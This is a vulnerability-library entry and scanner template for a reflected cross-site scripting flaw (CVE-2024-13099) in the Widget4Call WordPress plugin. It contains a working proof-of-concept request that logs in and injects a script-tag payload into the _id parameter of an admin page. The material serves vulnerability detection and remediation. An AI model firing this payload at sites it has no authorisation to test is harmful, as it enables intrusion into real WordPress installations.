/Vulnerability Library

Widget4Call WordPress - Cross-Site Scripting

CVE-2024-13099
Verified

Description

Widget4Call WordPress plugin <= 1.0.7 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.

Severity

Medium

CVSS Score

5.4

Exploit Probability

4%

Affected Product

widget4call

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-13099.yaml
id: CVE-2024-13099

info:
  name: Widget4Call WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Widget4Call WordPress plugin <= 1.0.7 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of Widget4Call plugin that addresses this issue.
  reference:
    - https://wpscan.com/vulnerability/a0cabf5c-7b01-4163-834b-a134db3a90b4/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-13099
    cwe-id: CWE-79
    epss-score: 0.04312
    epss-percentile: 0.89013
    cpe: cpe:2.3:a:apidaze:widget4call:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apidaze
    product: widget4call
  tags: cve,cve2024,wp-scan,wordpress,wp-plugin,apidaze,widget4call

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=w4c_devmode&_id=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 4b0a004830460221009f442bafa9e372158362a4e7c84bc20f3790a3379c7a1572526ab1570a6d1cf7022100e236ad9ffb18373afbe3a1f0084e65a68c48da3267456a46d20c39ecf12bed43:922c64590222798bb761d5b6d8e72950
5.4Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CVE ID:
cve-2024-13099
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/a0cabf5c-7b01-4163-834b-a134db3a90b4/

Remediation Steps

Update to the latest version of Widget4Call plugin that addresses this issue.